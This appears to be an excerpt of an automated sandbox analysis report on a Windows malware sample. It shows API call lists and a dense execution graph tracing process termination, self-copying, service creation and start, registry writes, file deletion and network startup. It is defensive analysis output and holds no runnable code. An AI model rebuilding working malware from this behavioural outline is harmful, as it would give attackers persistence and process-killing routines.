• TerminateProcess.KERNEL32(00000000,000000FF), ref: 00ECBE24
• CloseHandle.KERNEL32(00000000), ref: 00ECBE68
• Process32Next.KERNEL32(00000000,00000128), ref: 00ECBF01
• CloseHandle.KERNEL32(00000000), ref: 00ECBF2F
Similarity
• API ID: CloseHandleProcess$NextOpenProcess32Terminate
• String ID:
• API String ID: 3173823348-0
APIs
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00ECD11A
• ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 00ECD1CC
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00ECD3EE
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00ECD2E9
  • Part of subcall function 00EEFCC0: ReleaseMutex.KERNEL32(00ECD410,?,00ECD410,00000128), ref: 00EEFCE9
Similarity
• API ID: CloseFileHandle$CreateMutexReadRelease
• String ID:
• API String ID: 1760212717-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,?,?,00ED03A9,00000000,?), ref: 00ED6957
• RtlReAllocateHeap.NTDLL(00000000,?,00ED03A9,00000000), ref: 00ED695E
• GetProcessHeap.KERNEL32(00000000,?,?,00ED03A9,00000000,?), ref: 00ED69C8
• HeapAlloc.KERNEL32(00000000,?,00ED03A9,00000000,?), ref: 00ED69CF
Similarity
• API ID: Heap$Process$AllocAllocate
• String ID:
• API String ID: 1154092256-0
Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID:
• String ID: XH$/
• API String ID: 0-571299465
• Opcode ID: 24494eb224d859068fe71043c8e3c79e28e68fd185f11fc856fff3c0035d3a63
• Instruction ID: 8aa204b5c9123a443755abc5a65ee24111d81f95b0c09954eccaf95aadda893d
• Opcode Fuzzy Hash: 24494eb224d859068fe71043c8e3c79e28e68fd185f11fc856fff3c0035d3a63
• Instruction Fuzzy Hash: CCF12331A0024DDFD704EF60FD92ABA37BAFB54320F00816AE946772B1EB715959EB50

Execution Graph

Execution Coverage: 11.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.1%
Total number of Nodes: 1717
Total number of Limit Nodes: 22
                                                                                                                                                                                                            execution_graph 11172 9f5f98 11173 9f5706 11172->11173 11174 9f86f1 11173->11174 11176 9dd500 lstrlen 11173->11176 11176->11173 10617 9de211 10618 9de240 ExitProcess 10617->10618 10620 9e6c10 10621 9e6c21 RegisterServiceCtrlHandlerA 10620->10621 10623 9e6fc8 10621->10623 10624 9e6da2 SetServiceStatus CreateEventA 10621->10624 10625 9e6e3b 10624->10625 10626 9e6e58 SetServiceStatus 10624->10626 10625->10626 10627 9e6ea0 WaitForSingleObject 10626->10627 10627->10627 10628 9e6ecb 10627->10628 10629 9f3110 WaitForSingleObject 10628->10629 10630 9e6eff SetServiceStatus CloseHandle SetServiceStatus 10629->10630 10630->10623 11177 9ebf90 11180 9ee140 11177->11180 11181 9ee158 11180->11181 11182 9f0b00 8 API calls 11181->11182 11183 9ebfb3 11182->11183 11184 9f4590 11185 9f45bd 11184->11185 11186 9f0610 2 API calls 11185->11186 11187 9f45c2 11186->11187 11188 9ffde0 3 API calls 11187->11188 11189 9f45ee 11188->11189 10350 a04eb3 10351 a04ec5 10350->10351 10353 9d7a04 136 API calls 10351->10353 10352 a04ec9 10353->10352 11385 9dbd08 11390 9dbd10 11385->11390 11386 9da4e0 lstrlen 11386->11390 11387 9dbdbb OpenProcess 11388 9dbe02 TerminateProcess 11387->11388 11387->11390 11388->11390 11391 9dbe67 CloseHandle 11388->11391 11389 9dbedd Process32Next 11389->11390 11392 9dbf19 CloseHandle 11389->11392 11390->11386 11390->11387 11390->11389 11390->11391 11391->11390 11394 9dbf47 11392->11394 11395 9da307 11396 9da310 Sleep 11395->11396 11396->11396 10354 9d2080 10355 9d2097 10354->10355 10358 9f0790 10355->10358 10359 9f0a0d 10358->10359 10360 9f07cb 10358->10360 10376 9da850 10359->10376 10362 9f0926 10360->10362 10364 9f07e5 10360->10364 10363 9ed9a0 4 API calls 10362->10363 10366 9d21e4 10363->10366 10367 9ed9a0 10364->10367 10369 9ed9c5 10367->10369 10368 9eda26 10368->10366 
10369->10368 10370 9edadb 10369->10370 10384 9e2c90 10369->10384 10371 9e2c90 4 API calls 10370->10371 10373 9edb90 10370->10373 10371->10373 10389 9d1170 10373->10389 10377 9da8dc 10376->10377 10378 9e2c90 4 API calls 10377->10378 10380 9daa1a 10377->10380 10378->10380 10379 9f3a80 4 API calls 10382 9daa81 10379->10382 10380->10379 10381 9dacfe 10380->10381 10381->10366 10382->10381 10383 9f3a80 4 API calls 10382->10383 10383->10382 10386 9e2cb9 10384->10386 10385 9e2ce0 10385->10370 10386->10385 10393 9f3a80 10386->10393 10388 9e2d76 10388->10370 10391 9d119e 10389->10391 10390 9d1396 10390->10366 10391->10390 10392 9e2eb0 2 API calls 10391->10392 10392->10391 10394 9f3ab7 10393->10394 10397 9f3ae7 10393->10397 10395 9de2c0 2 API calls 10394->10395 10396 9f3ade 10395->10396 10396->10397 10398 9e2eb0 2 API calls 10396->10398 10397->10388 10398->10397 10399 9d1080 10400 9d108b 10399->10400 10403 9f0b00 10400->10403 10402 9d1117 10404 9f3f00 8 API calls 10403->10404 10405 9f0b1c 10404->10405 10405->10402 11190 9dc980 11191 9dc99d 11190->11191 11192 9de2c0 2 API calls 11191->11192 11193 9dc9f6 11192->11193 11397 9e1500 11400 9eee60 11397->11400 11401 9eb720 lstrlen 11400->11401 11402 9e150f 11401->11402 9457 a04f8a 9458 a04ec5 9457->9458 9461 9d7a04 9458->9461 9462 9e1bb0 2 API calls 9461->9462 9463 9d7a18 9462->9463 9464 9d2f90 2 API calls 9463->9464 9465 9d7a60 9464->9465 9466 9e1bb0 2 API calls 9465->9466 9467 9d7aa7 9466->9467 9468 9d2f90 2 API calls 9467->9468 9469 9d7b0e 9468->9469 9470 9e1bb0 2 API calls 9469->9470 9471 9d7b22 9470->9471 9472 9d2f90 2 API calls 9471->9472 9473 9d7bad 9472->9473 9474 9e1bb0 2 API calls 9473->9474 9475 9d7bc3 9474->9475 9476 9d2f90 2 API calls 9475->9476 9477 9d7c07 9476->9477 9478 9e1bb0 2 API calls 9477->9478 9479 9d7c7a 9478->9479 9480 9d2f90 2 API calls 9479->9480 9481 9d7cb7 9480->9481 9482 9e1bb0 2 API calls 9481->9482 9483 9d7d1b 9482->9483 9484 9d2f90 2 API calls 9483->9484 9485 9d7d90 9484->9485 9486 9e1bb0 2 API calls 
9485->9486 9487 9d7da6 9486->9487 9488 9d2f90 2 API calls 9487->9488 9489 9d7dfc 9488->9489 9490 9e1bb0 2 API calls 9489->9490 9491 9d7e1a 9490->9491 9492 9d2f90 2 API calls 9491->9492 9493 9d7e73 9492->9493 9494 9e1bb0 2 API calls 9493->9494 9495 9d7e87 9494->9495 9496 9d2f90 2 API calls 9495->9496 9497 9d7ef1 9496->9497 9498 9e1bb0 2 API calls 9497->9498 9499 9d7f05 9498->9499 9500 9d2f90 2 API calls 9499->9500 9501 9d7f42 9500->9501 9502 9e1bb0 2 API calls 9501->9502 9503 9d7f62 9502->9503 9504 9d2f90 2 API calls 9503->9504 9505 9d7fe8 9504->9505 9506 9e1bb0 2 API calls 9505->9506 9507 9d8004 9506->9507 9508 9d2f90 2 API calls 9507->9508 9509 9d8093 9508->9509 9510 9e1bb0 2 API calls 9509->9510 9511 9d80a7 9510->9511 9512 9d2f90 2 API calls 9511->9512 9513 9d8106 9512->9513 9514 9e1bb0 2 API calls 9513->9514 9515 9d818f 9514->9515 9516 9d2f90 2 API calls 9515->9516 9517 9d81d1 9516->9517 9518 9e1bb0 2 API calls 9517->9518 9519 9d81eb 9518->9519 9520 9d2f90 2 API calls 9519->9520 9521 9d8230 9520->9521 9522 9e1bb0 2 API calls 9521->9522 9523 9d8268 9522->9523 9524 9e1bb0 2 API calls 9523->9524 9525 9d82b6 9524->9525 9526 9e2eb0 2 API calls 9525->9526 9527 9d8388 9526->9527 9702 a050e0 9527->9702 9529 9d839b 9530 9d2f90 2 API calls 9529->9530 9531 9d83c0 GetEnvironmentVariableA 9530->9531 9532 9e1bb0 2 API calls 9531->9532 9533 9d83f9 CreateMutexA 9532->9533 9535 9d8480 CreateMutexA CreateMutexA 9533->9535 9537 9d8521 9535->9537 9538 9d868b 9537->9538 9539 9d8587 GetTickCount 9537->9539 9709 9e5200 9538->9709 9541 9d85a5 9539->9541 9543 9d2f90 2 API calls 9541->9543 9542 9d86a4 GetCommandLineA 9544 9d86cb 9542->9544 9546 9d85bd 9543->9546 9545 9d2f90 2 API calls 9544->9545 9547 9d874d 9545->9547 9548 9e1bb0 2 API calls 9546->9548 9550 9e1bb0 2 API calls 9547->9550 9549 9d8622 9548->9549 9549->9538 9551 9d878c 9550->9551 9552 9d9235 GetCommandLineA 9551->9552 9554 9d2f90 2 API calls 9551->9554 9811 9fb990 9552->9811 9556 9d87dd 9554->9556 9557 9e1bb0 2 API calls 
9556->9557 9559 9d8812 9557->9559 9558 9d9271 9814 9dd500 lstrlen 9558->9814 9560 9d8842 9559->9560 9563 9d2800 ExitProcess 9559->9563 9565 9d2f90 2 API calls 9560->9565 9562 9d9323 GetModuleFileNameA 9815 9da4e0 lstrlen 9562->9815 9563->9560 9566 9d88ab 9565->9566 9568 9e1bb0 2 API calls 9566->9568 9567 9d93ae 9570 9da4e0 lstrlen 9567->9570 9569 9d88db 9568->9569 9571 9d8926 9569->9571 9573 9d2800 ExitProcess 9569->9573 9572 9d945a 9570->9572 9959 9de430 9571->9959 9574 9da4e0 lstrlen 9572->9574 9573->9571 9586 9d947b 9574->9586 9576 9d8961 9577 9d2f90 2 API calls 9576->9577 9578 9d8978 9577->9578 9582 9e1bb0 2 API calls 9578->9582 9579 9d9744 9817 9f3cf0 9579->9817 9581 9d97b2 9583 9d97d4 9581->9583 9584 9d2800 ExitProcess 9581->9584 9588 9d89cb 9582->9588 9826 9f9b00 9583->9826 9584->9583 9586->9579 9591 9d954b 9586->9591 9587 9d981d 9920 a008b0 GetSystemTimeAsFileTime 9587->9920 9596 9d8ab7 9588->9596 9590 9d9830 9922 9f48d0 9590->9922 9998 9e8a70 9591->9998 9594 9d956f 10004 9f9580 9594->10004 9600 a008b0 GetSystemTimeAsFileTime 9596->9600 9603 9d8b61 Sleep 9596->9603 9608 9d8c99 Sleep 9596->9608 9609 9e1530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9596->9609 9628 9d8cd8 9596->9628 9964 9e2120 9596->9964 9598 9d98a8 9610 9d9952 WSAStartup 9598->9610 9599 9d971a 9601 9d2800 ExitProcess 9599->9601 9600->9596 9601->9579 9602 9d2f90 2 API calls 9605 9d9651 9602->9605 9603->9596 9604 9d958b 9604->9599 9604->9602 10017 9dd500 lstrlen 9605->10017 9607 9d9666 MessageBoxA 9614 9e1bb0 2 API calls 9607->9614 9608->9596 9609->9596 9612 9d99b6 9610->9612 9617 9d2f90 2 API calls 9612->9617 9623 9d99ff 9612->9623 9613 9e2120 5 API calls 9613->9628 9616 9d96ef 9614->9616 9615 9d8de6 9988 9e1530 9615->9988 9619 9d2800 ExitProcess 9616->9619 9620 9d99e4 9617->9620 9619->9599 10018 9dc540 9620->10018 9622 9d9a7b 9634 9d9d65 9622->9634 9635 9d9aa3 CloseHandle SetFileAttributesA CopyFileA 9622->9635 9623->9622 9926 9eee80 9623->9926 9624 9d8e04 9632 9d8e5c 
GetModuleFileNameA SetFileAttributesA CopyFileA 9624->9632 9633 9d91a4 9624->9633 9626 9d8d8c Sleep 9626->9628 9628->9613 9628->9615 9975 9dbbc0 9628->9975 9629 9d9a32 9630 9d9a36 9629->9630 9631 9d9a53 9629->9631 9636 9d2800 ExitProcess 9630->9636 10023 9d26e0 9631->10023 9638 9d2f90 2 API calls 9632->9638 9645 9ffa80 3 API calls 9633->9645 9650 9d9d76 9634->9650 9639 9d9b1a SetFileAttributesA 9635->9639 9640 9d9c78 9635->9640 9636->9631 9651 9d8eff 9638->9651 9641 9d9b73 9639->9641 9642 9d9b5d 9639->9642 9647 9f3110 WaitForSingleObject 9640->9647 9648 9d9c2a Sleep 9641->9648 10031 9e7a50 9641->10031 9937 9e0500 OpenSCManagerA 9642->9937 9646 9d9210 9645->9646 9652 9d2800 ExitProcess 9646->9652 9653 9d9d15 9647->9653 9951 9ffa80 9648->9951 9649 9e2120 5 API calls 9649->9650 9650->9649 9656 9d9e57 SetFileAttributesA CopyFileA SetFileAttributesA 9650->9656 9659 9dbbc0 8 API calls 9650->9659 9657 9e1bb0 2 API calls 9651->9657 9652->9552 9956 9d2800 9653->9956 9664 9de430 lstrlen 9656->9664 9661 9d8f61 9657->9661 9663 9d9e1a Sleep 9659->9663 9666 9d2f90 2 API calls 9661->9666 9676 9d904a 9661->9676 9663->9650 9663->9656 9665 9d9ee1 9664->9665 9669 9d2f90 2 API calls 9665->9669 9671 9d8fbf 9666->9671 9667 9d913d SetFileAttributesA 9667->9633 9668 9d9113 SetFileAttributesA 9668->9633 9672 9d9efd 9669->9672 9674 9e1bb0 2 API calls 9671->9674 9673 9d2f90 2 API calls 9672->9673 9675 9d9fbe 9673->9675 9674->9676 9677 9e1bb0 2 API calls 9675->9677 9676->9667 9676->9668 9678 9da039 9677->9678 10041 9e0dc0 9678->10041 9680 9da050 9681 9e1bb0 2 API calls 9680->9681 9682 9da06b 9681->9682 10045 9e1200 9682->10045 9685 9d2f90 2 API calls 9686 9da0ae 9685->9686 9687 9d2f90 2 API calls 9686->9687 9688 9da0c6 9687->9688 10066 a05820 9688->10066 9690 9da0f2 9691 9e1bb0 2 API calls 9690->9691 9692 9da115 9691->9692 9693 9e1bb0 2 API calls 9692->9693 9694 9da127 9693->9694 9695 9ffa80 3 API calls 9694->9695 9696 9da185 9695->9696 9697 9da24e CreateThread 9696->9697 9698 9da2cd 
9697->9698 9699 9da2a2 9697->9699 9701 9da310 Sleep 9698->9701 10069 9dc660 StartServiceCtrlDispatcherA 9699->10069 9701->9701 9703 a05172 9702->9703 9704 a05186 GetSystemTime 9702->9704 9703->9704 9705 a051be 9704->9705 9706 a008b0 GetSystemTimeAsFileTime 9705->9706 9707 a052a7 GetTickCount 9706->9707 9708 a052d4 9707->9708 9708->9529 9710 9e521d 9709->9710 9711 9e52b2 GetVersionExA 9710->9711 10070 9db7a0 AllocateAndInitializeSid 9711->10070 9717 9d2f90 2 API calls 9718 9e5652 9717->9718 10090 9dd530 9718->10090 9721 9e1bb0 2 API calls 9726 9e5692 9721->9726 9722 9e5496 CreateDirectoryA 9724 9d2f90 2 API calls 9722->9724 9723 9e5357 9723->9722 9725 9e54bb 9724->9725 9727 9e1bb0 2 API calls 9725->9727 10094 9e1d90 9726->10094 9731 9e550a 9727->9731 9729 9e56cb 9730 9e56d6 DeleteFileA RemoveDirectoryA 9729->9730 9732 9e575d 9729->9732 9730->9732 9731->9717 9733 9df0d0 6 API calls 9732->9733 9734 9e5776 9733->9734 9735 9e581e CreateDirectoryA 9734->9735 9736 9e585b 9735->9736 9737 9de430 lstrlen 9736->9737 9738 9e58cb CreateDirectoryA 9737->9738 9739 9e5917 9738->9739 9740 9d2f90 2 API calls 9739->9740 9741 9e592d 9740->9741 9742 9d2f90 2 API calls 9741->9742 9743 9e59e9 9742->9743 9744 9e1bb0 2 API calls 9743->9744 9745 9e5a07 9744->9745 9746 9dd530 9 API calls 9745->9746 9747 9e5a77 9746->9747 9748 9e1bb0 2 API calls 9747->9748 9749 9e5aaa 9748->9749 9750 9e1d90 5 API calls 9749->9750 9751 9e5ad7 9750->9751 9752 9e64f5 9751->9752 9753 9e5b07 9751->9753 9754 9e5c42 9751->9754 9759 9de430 lstrlen 9752->9759 9756 9d2f90 2 API calls 9753->9756 9755 9d2f90 2 API calls 9754->9755 9757 9e5c61 9755->9757 9758 9e5b2d 9756->9758 9761 a05820 wvsprintfA 9757->9761 9762 a05820 wvsprintfA 9758->9762 9760 9e6549 SetFileAttributesA 9759->9760 9766 9e657e 9760->9766 9763 9e5c87 9761->9763 9764 9e5b5a 9762->9764 9765 9e1bb0 2 API calls 9763->9765 9767 9e1bb0 2 API calls 9764->9767 9769 9e5b9f 9765->9769 9766->9542 9767->9769 9768 9e5bea 9770 9e5d53 CreateDirectoryA 9768->9770 
9769->9768 9771 9e5d9a 9770->9771 9772 9de430 lstrlen 9771->9772 9773 9e5e4f CreateDirectoryA 9772->9773 9774 9d2f90 2 API calls 9773->9774 9775 9e5e9e 9774->9775 9776 9d2f90 2 API calls 9775->9776 9777 9e5f4c 9776->9777 9778 9e1bb0 2 API calls 9777->9778 9779 9e5f68 9778->9779 9780 9dd530 9 API calls 9779->9780 9781 9e5f86 9780->9781 9782 9e1bb0 2 API calls 9781->9782 9783 9e5fcf 9782->9783 9784 9e1d90 5 API calls 9783->9784 9785 9e6002 9784->9785 9786 9e600d GetTempPathA 9785->9786 9787 9e6485 9785->9787 10110 9dd500 lstrlen 9786->10110 9787->9752 9789 9e604f 9790 9de430 lstrlen 9789->9790 9791 9e61cb CreateDirectoryA 9790->9791 9793 9e6219 9791->9793 9794 9d2f90 2 API calls 9793->9794 9795 9e6237 9794->9795 9796 9d2f90 2 API calls 9795->9796 9797 9e62be 9796->9797 9798 9e1bb0 2 API calls 9797->9798 9799 9e6302 9798->9799 9800 9dd530 9 API calls 9799->9800 9801 9e6360 9800->9801 9802 9e1bb0 2 API calls 9801->9802 9803 9e6372 9802->9803 9804 9e1d90 5 API calls 9803->9804 9805 9e63b5 9804->9805 9805->9787 9806 9e63c0 GetTempPathA 9805->9806 9807 9e63ff 9806->9807 9808 9d2f90 2 API calls 9807->9808 9809 9e642d 9808->9809 9810 9e1bb0 2 API calls 9809->9810 9810->9787 10145 9dd500 lstrlen 9811->10145 9813 9fb9c3 9813->9558 9814->9562 9816 9da53c 9815->9816 9816->9567 9818 9f3d35 9817->9818 9819 9de430 lstrlen 9818->9819 9820 9f3d66 9819->9820 9821 9d2f90 2 API calls 9820->9821 9822 9f3d82 9821->9822 9823 9e1bb0 2 API calls 9822->9823 9824 9f3dd1 CreateFileA 9823->9824 9825 9f3e32 9824->9825 9825->9581 9827 9f9b93 9826->9827 9828 9f9c40 GetComputerNameA 9827->9828 9829 9f9c53 9828->9829 9830 9f9cbb 9828->9830 9831 9d2f90 2 API calls 9829->9831 9832 9d2f90 2 API calls 9830->9832 9833 9f9c7e 9831->9833 9834 9f9d55 9832->9834 9835 9e1bb0 2 API calls 9833->9835 9836 9e1bb0 2 API calls 9834->9836 9835->9830 9837 9f9db1 9836->9837 9838 9dd530 9 API calls 9837->9838 9839 9f9dd5 9838->9839 10146 9e2c30 9839->10146 9841 9f9e08 10149 9ea930 9841->10149 9843 9f9f23 10191 9dd500 
lstrlen 9843->10191 9845 9f9f65 10192 a001a0 9845->10192 9849 9f9fcf 9850 9e2c30 8 API calls 9849->9850 9851 9f9ffe 9850->9851 9852 a001a0 9 API calls 9851->9852 9853 9fa0a3 9852->9853 9854 a01050 8 API calls 9853->9854 9855 9fa0b2 9854->9855 9856 9e2c30 8 API calls 9855->9856 9857 9fa0dd 9856->9857 9858 a001a0 9 API calls 9857->9858 9859 9fa118 9858->9859 9860 a01050 8 API calls 9859->9860 9861 9fa127 9860->9861 9862 9e2c30 8 API calls 9861->9862 9863 9fa16c 9862->9863 9864 a001a0 9 API calls 9863->9864 9865 9fa18b 9864->9865 9866 a01050 8 API calls 9865->9866 9867 9fa197 9866->9867 9868 9e2c30 8 API calls 9867->9868 9869 9fa1e1 9868->9869 9870 a001a0 9 API calls 9869->9870 9871 9fa204 9870->9871 9872 a01050 8 API calls 9871->9872 9873 9fa213 9872->9873 9874 9e2c30 8 API calls 9873->9874 9875 9fa248 9874->9875 9876 9d2f90 2 API calls 9875->9876 9877 9fa280 9876->9877 9878 a001a0 9 API calls 9877->9878 9879 9fa2bf 9878->9879 9880 a01050 8 API calls 9879->9880 9881 9fa2ce 9880->9881 9882 9e1bb0 2 API calls 9881->9882 9883 9fa2f5 9882->9883 9884 9e2c30 8 API calls 9883->9884 9885 9fa31b 9884->9885 9886 a001a0 9 API calls 9885->9886 9887 9fa347 9886->9887 9888 a01050 8 API calls 9887->9888 9889 9fa353 9888->9889 9890 9e2c30 8 API calls 9889->9890 9891 9fa391 9890->9891 9892 a001a0 9 API calls 9891->9892 9893 9fa3aa 9892->9893 9894 a01050 8 API calls 9893->9894 9895 9fa3b9 9894->9895 9896 9e2c30 8 API calls 9895->9896 9897 9fa402 9896->9897 10199 9e2f60 9897->10199 9901 9fa465 9902 a001a0 9 API calls 9901->9902 9903 9fa471 9902->9903 9904 a01050 8 API calls 9903->9904 9905 9fa480 9904->9905 9906 9e2c30 8 API calls 9905->9906 9907 9fa4d1 9906->9907 9908 a001a0 9 API calls 9907->9908 9909 9fa502 9908->9909 9910 a01050 8 API calls 9909->9910 9911 9fa511 9910->9911 10208 9e97b0 9911->10208 9913 9fa54f 10235 9ed990 9913->10235 9915 9fa575 10238 9e4290 9915->10238 9917 9fa5b3 10242 9f0480 9917->10242 9919 9fa63b 9919->9587 9921 a00958 __aulldiv 9920->9921 9921->9590 9923 
9f4926 9922->9923 10278 9dd500 lstrlen 9923->10278 9925 9f4948 9925->9598 9927 9eee9d 9926->9927 9928 9de430 lstrlen 9927->9928 9929 9eeef8 9928->9929 9930 9d2f90 2 API calls 9929->9930 9931 9eef29 9929->9931 9932 9eef91 9930->9932 9931->9629 9933 9e1bb0 2 API calls 9932->9933 9934 9ef001 9933->9934 10279 9dd000 9934->10279 9936 9ef020 9936->9629 9938 9e07be 9937->9938 9939 9e055f CreateServiceA 9937->9939 9938->9641 9940 9e05be 9939->9940 9941 9e06bc 9940->9941 9942 9e05d8 ChangeServiceConfig2A StartServiceA 9940->9942 9944 9e06ce 9941->9944 9945 9e06e1 OpenServiceA 9941->9945 9943 9e067e CloseServiceHandle 9942->9943 9949 9e077e CloseServiceHandle 9943->9949 9944->9945 9946 9e0716 StartServiceA CloseServiceHandle 9945->9946 9947 9e075e 9945->9947 9946->9947 9947->9949 9949->9938 9952 9ffaaa 9951->9952 9953 9ffb6a CreateProcessA 9952->9953 9954 9ffc8f 9953->9954 9955 9ffbff CloseHandle CloseHandle 9953->9955 9954->9640 9955->9640 9957 9d281d 9956->9957 9958 9d283e ExitProcess 9957->9958 9960 9f48d0 lstrlen 9959->9960 9961 9de451 9960->9961 9962 9de480 9961->9962 10298 9dd500 lstrlen 9961->10298 9962->9576 9965 9e218c 9964->9965 9966 9e2196 CreateToolhelp32Snapshot 9964->9966 9965->9966 9967 9e21fe Process32First 9966->9967 9968 9e2450 9966->9968 9970 9e240d CloseHandle 9967->9970 9972 9e227a 9967->9972 9968->9596 9970->9968 9971 9da4e0 lstrlen 9971->9972 9972->9971 9973 9e2346 Process32Next 9972->9973 9974 9e239c 9972->9974 9973->9972 9973->9974 9974->9970 9976 9dbbe1 CreateToolhelp32Snapshot 9975->9976 9978 9dbcbb Process32First 9976->9978 9979 9dbf47 9976->9979 9980 9dbf1a CloseHandle 9978->9980 9985 9dbd05 9978->9985 9979->9626 9980->9979 9981 9da4e0 lstrlen 9981->9985 9982 9dbdbb OpenProcess 9983 9dbe02 TerminateProcess 9982->9983 9982->9985 9983->9985 9986 9dbe67 CloseHandle 9983->9986 9984 9dbedd Process32Next 9984->9985 9987 9dbf19 9984->9987 9985->9981 9985->9982 9985->9984 9985->9986 9986->9985 9987->9980 9989 9e157f CreateFileA 9988->9989 9990 9e1561 
9988->9990 9991 9e1611 9989->9991 9990->9989 9992 9e1657 9991->9992 9993 9e1673 GetFileTime 9991->9993 9992->9624 9994 9e1694 CloseHandle 9993->9994 9995 9e16bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9993->9995 9994->9624 9996 9e1771 GetFileSize CloseHandle 9995->9996 9997 9e17be 9996->9997 9997->9624 9999 9e8a95 9998->9999 10299 9dca40 9999->10299 10001 9e8b1d 10002 9ffa80 3 API calls 10001->10002 10003 9e8b65 10002->10003 10003->9594 10005 9f9902 10004->10005 10006 9f95a9 10004->10006 10005->9604 10337 9dd500 lstrlen 10006->10337 10008 9f965d Sleep 10009 9f96b9 10008->10009 10010 9d2f90 2 API calls 10009->10010 10011 9f96e9 10010->10011 10012 9e1bb0 2 API calls 10011->10012 10013 9f979d FindFirstFileA 10012->10013 10014 9f97d6 10013->10014 10014->10005 10015 9f9877 DeleteFileA FindNextFileA 10014->10015 10015->10014 10016 9f98d9 FindClose 10015->10016 10016->10005 10017->9607 10019 9f3110 WaitForSingleObject 10018->10019 10020 9dc562 10019->10020 10021 9d2800 ExitProcess 10020->10021 10022 9dc578 10021->10022 10022->9623 10024 a008b0 GetSystemTimeAsFileTime 10023->10024 10026 9d2703 10024->10026 10025 9d27c8 10025->9622 10026->10025 10027 a008b0 GetSystemTimeAsFileTime 10026->10027 10029 9d2751 10027->10029 10028 9d2770 Sleep 10028->10029 10029->10025 10029->10028 10030 a008b0 GetSystemTimeAsFileTime 10029->10030 10030->10029 10032 9e7ab7 10031->10032 10033 9d2f90 2 API calls 10032->10033 10034 9e7b71 10033->10034 10035 9e1bb0 2 API calls 10034->10035 10036 9e7bcb 10035->10036 10037 9e7cc0 RegCloseKey 10036->10037 10338 9dd500 lstrlen 10036->10338 10038 9d9c15 10037->10038 10038->9648 10040 9e7c87 RegSetValueExA 10040->10037 10044 9e0de7 10041->10044 10042 9e0f4e CreateFileA 10043 9e0f80 10042->10043 10043->9680 10044->10042 10046 9e126b 10045->10046 10047 9e1254 10045->10047 10049 9d2f90 2 API calls 10046->10049 10048 9e0920 9 API calls 10047->10048 10048->10046 10050 9e12b3 10049->10050 10051 9e0dc0 CreateFileA 10050->10051 10052 9e12cd 10051->10052 10053 
9e1bb0 2 API calls 10052->10053 10054 9e131f 10053->10054 10055 9e1378 Sleep 10054->10055 10056 9e1420 10054->10056 10057 9d2f90 2 API calls 10055->10057 10058 9da090 10056->10058 10339 9e10e0 10056->10339 10059 9e13b7 10057->10059 10058->9685 10061 9e0dc0 CreateFileA 10059->10061 10063 9e13cc 10061->10063 10062 9e147c 10344 a05370 CloseHandle 10062->10344 10065 9e1bb0 2 API calls 10063->10065 10065->10056 10067 a0587d wvsprintfA 10066->10067 10068 a0586d 10066->10068 10067->9690 10068->10067 10069->9698 10071 9db84e 10070->10071 10072 9db86a CheckTokenMembership 10071->10072 10073 9db887 10071->10073 10072->10073 10074 9dfbc0 10073->10074 10075 9dfc3c 10074->10075 10076 9d2f90 2 API calls 10075->10076 10077 9dfc76 GetProcAddress 10076->10077 10078 9e1bb0 2 API calls 10077->10078 10079 9dfcb4 10078->10079 10080 9dfcdc 10079->10080 10081 9dfcc5 GetCurrentProcess 10079->10081 10080->9731 10082 9df0d0 GetWindowsDirectoryA 10080->10082 10081->10080 10083 9df122 10082->10083 10084 9d2f90 2 API calls 10083->10084 10085 9df1d3 10083->10085 10086 9df170 10084->10086 10085->9723 10087 9e1bb0 2 API calls 10086->10087 10088 9df1bb 10087->10088 10111 9dd500 lstrlen 10088->10111 10091 9dd54a 10090->10091 10112 9dfa50 10091->10112 10095 9e1d9d 10094->10095 10096 9f3110 WaitForSingleObject 10095->10096 10097 9e1e0c 10096->10097 10098 9e1e4c CreateFileA 10097->10098 10099 9e1e23 10097->10099 10101 9e1e93 10098->10101 10105 9e1ed1 10098->10105 10100 9ffcc0 ReleaseMutex 10099->10100 10102 9e1e39 10100->10102 10103 9ffcc0 ReleaseMutex 10101->10103 10102->9729 10104 9e1eaf 10103->10104 10104->9729 10106 9e1fe8 WriteFile 10105->10106 10106->10105 10107 9e2069 FindCloseChangeNotification 10106->10107 10108 9ffcc0 ReleaseMutex 10107->10108 10109 9e20a1 10108->10109 10109->9729 10110->9789 10111->10085 10113 9dfa7e 10112->10113 10118 9dd500 lstrlen 10113->10118 10115 9dfae4 10119 9e2df0 10115->10119 10117 9dd55f 10117->9721 10118->10115 10122 9ebff0 10119->10122 10121 9e2e3e 10121->10117 
APIs
• GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 009D83DA
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 009D8448
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 009D84DC
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 009D84F7
• GetTickCount.KERNEL32 ref: 009D8599
  • Part of subcall function 009E5200: GetVersionExA.KERNEL32(00A5AE70), ref: 009E52CC
• Sleep.KERNEL32(00000D05), ref: 009D8B70
• Sleep.KERNEL32(000007D0), ref: 009D8DAC
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 009D8E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 009D8E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 009D8EC3
